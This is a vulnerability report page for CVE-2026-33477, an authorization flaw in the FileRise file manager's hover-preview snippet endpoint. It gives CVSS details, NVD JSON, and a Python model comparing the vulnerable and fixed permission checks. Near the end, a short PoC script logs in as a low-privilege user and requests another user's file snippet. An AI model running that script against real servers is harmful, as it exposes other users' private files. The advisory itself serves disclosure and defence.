Security Vulnerability Report
CVE-2026-33477 CVSS 4.3 MEDIUM

Published: 2026-03-26 18:16:30
Last Modified: 2026-03-31 12:38:13

Description

FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. In versions 2.3.7 through 3.10.0, the file snippet endpoint `/api/file/snippet.php` allows an authenticated user with only `read_own` access to a folder to retrieve snippet content (the hover preview) from files uploaded by other users in the same folder. The `read_own` permission is meant to restrict a user to files they uploaded themselves; the server-side check behind hover previews granted the snippet to anyone with read access to the folder and did not verify that the requester was the file's uploader. Version 3.11.0 fixes the issue. Weakness: CWE-863 (Incorrect Authorization).
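The following is an added illustration of the authorization gap described above, not FileRise's own code: the ACL table, file records, permission names and function names are a constructed model, chosen only to show where a `read_own` check has to look. The vulnerable handler gates on the folder permission alone; the fixed handler resolves the file first and compares its recorded uploader with the requesting user.

```python
from dataclasses import dataclass

# Constructed model of a folder-scoped permission check. Nothing here is
# FileRise's implementation; the names and data are hypothetical.


@dataclass(frozen=True)
class StoredFile:
    folder: str
    name: str
    uploader: str   # recorded server side at upload time
    content: str


# Per-(user, folder) permission: "read" may preview every file in the folder,
# "read_own" may preview only files that this user uploaded.
FOLDER_ACL = {
    ("alice", "shared"): "read_own",
    ("bob", "shared"): "read_own",
    ("carol", "shared"): "read",
}

# Constructed sample files in one folder, uploaded by different users.
FILES = [
    StoredFile("shared", "alice-notes.txt", "alice", "alice: quarterly numbers draft"),
    StoredFile("shared", "bob-report.txt", "bob", "bob: payroll export, do not share"),
]

SNIPPET_LEN = 120  # hover previews return only the start of the file


def _folder_permission(user: str, folder: str) -> str:
    """Folder-level gate: any read permission lets the caller in."""
    perm = FOLDER_ACL.get((user, folder))
    if perm not in ("read", "read_own"):
        raise PermissionError(f"{user} has no read access to {folder}")
    return perm


def _lookup(folder: str, name: str) -> StoredFile:
    for f in FILES:
        if f.folder == folder and f.name == name:
            return f
    raise FileNotFoundError(name)


def snippet_vulnerable(user: str, folder: str, name: str) -> str:
    """Folder-level check only: once the caller has any read permission on
    the folder, read_own behaves like read and other users' files leak."""
    _folder_permission(user, folder)
    return _lookup(folder, name).content[:SNIPPET_LEN]


def snippet_fixed(user: str, folder: str, name: str) -> str:
    """read_own is enforced against the file's recorded uploader, after the
    file is resolved, so folder access alone cannot satisfy it."""
    perm = _folder_permission(user, folder)
    f = _lookup(folder, name)
    if perm == "read_own" and f.uploader != user:
        raise PermissionError(f"{user} may only preview files they uploaded")
    return f.content[:SNIPPET_LEN]


def is_denied(handler, user: str, folder: str, name: str) -> bool:
    """True if the handler refuses the request with PermissionError."""
    try:
        handler(user, folder, name)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    # alice holds only read_own on "shared" and asks for bob's file.
    print("vulnerable:", snippet_vulnerable("alice", "shared", "bob-report.txt"))
    print("fixed denies:", is_denied(snippet_fixed, "alice", "shared", "bob-report.txt"))
    # carol holds full read and legitimately sees every file.
    print("fixed, carol:", snippet_fixed("carol", "shared", "bob-report.txt"))
```

The design point is the ordering: the ownership condition can only be evaluated once the concrete file record is in hand, so any preview, snippet or thumbnail endpoint that short-circuits after the folder check reproduces the flaw. In a real endpoint, return the same response for "denied" and "not found" so the check does not confirm that another user's file exists.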

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Exploitability subscore: 2.8; Impact subscore: 1.4 (from the NVD record below)

Reading the vector: reachable over the network, low attack complexity, low privileges (any authenticated user with `read_own` on the folder), no user interaction, scope unchanged; low confidentiality impact (a bounded snippet of another user's file), no integrity or availability impact.

Configurations (Affected Products)

cpe:2.3:a:filerise:filerise:*:*:*:*:*:*:*:* - VULNERABLE
Affected range: FileRise 2.3.7 and later, up to but excluding 3.11.0 (NVD match: versionStartIncluding 2.3.7, versionEndExcluding 3.11.0)
Examples of affected releases: FileRise 2.3.7, 2.3.8, 3.0.0, 3.10.0
Fixed in: FileRise 3.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys
import requests

# Target configuration
target_host = "http://filerise.example.com"
vulnerable_endpoint = "/api/file/snippet.php"

# Attacker's credentials (low-privilege user holding only read_own on the folder)
username = "attacker"
password = "password"

# 1. Authenticate to get a valid session.
#    The login endpoint and form field names are assumptions of this PoC; the
#    advisory names only /api/file/snippet.php. Confirm them against the target.
session = requests.Session()
login_payload = {"username": username, "password": password}
login_resp = session.post(f"{target_host}/api/login.php", data=login_payload)
if login_resp.status_code != 200:
    print("Login failed")
    sys.exit(1)

# 2. Identify a target file belonging to another user in the same folder.
#    The identifier might be guessed or enumerated.
victim_file_id = "45"

# 3. Request the snippet. The parameter names are likewise assumed by this PoC.
exploit_payload = {"file_id": victim_file_id, "action": "get_snippet"}
response = session.post(f"{target_host}{vulnerable_endpoint}", data=exploit_payload)

# A 200 with an empty or error body does not prove the flaw; inspect the content.
if response.status_code == 200:
    print("[+] Exploit Successful!")
    print("[+] Snippet content:")
    print(response.text)
else:
    print("[-] Exploit Failed")
    print(f"Status Code: {response.status_code}")
```

References

https://github.com/error311/FileRise/security/advisories/GHSA-62wx-vp78-2p83 (Vendor Advisory, Exploit, Mitigation)
https://github.com/error311/FileRise/releases/tag/v3.11.0 (Release Notes)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33477",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-26T18:16:29.580",
    "lastModified": "2026-03-31T12:38:12.703",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. In versiosn 2.3.7 through 3.10.0, the file snippet endpoint `/api/file/snippet.php` allows an authenticated user with only `read_own` access to a folder to retrieve snippet content from files uploaded by other users in the same folder. This is a server-side authorization flaw in the `read_own` enforcement for hover previews. Version 3.11.0 fixes the issue."
      },
      {
        "lang": "es",
        "value": "FileRise es un gestor de archivos autohospedado basado en web con carga de múltiples archivos, edición y operaciones por lotes. En las versiones 2.3.7 a la 3.10.0, el endpoint de fragmentos de archivo `/api/file/snippet.php` permite a un usuario autenticado con solo acceso 'read_own' a una carpeta recuperar contenido de fragmentos de archivos subidos por otros usuarios en la misma carpeta. Esto es una falla de autorización del lado del servidor en la aplicación de 'read_own' para las vistas previas al pasar el ratón. La versión 3.11.0 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:filerise:filerise:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.3.7",
                "versionEndExcluding": "3.11.0",
                "matchCriteriaId": "51D0BB82-B0E1-4A29-9C51-EA8DAE58105A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/error311/FileRise/releases/tag/v3.11.0",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/error311/FileRise/security/advisories/GHSA-62wx-vp78-2p83",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/error311/FileRise/security/advisories/GHSA-62wx-vp78-2p83",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```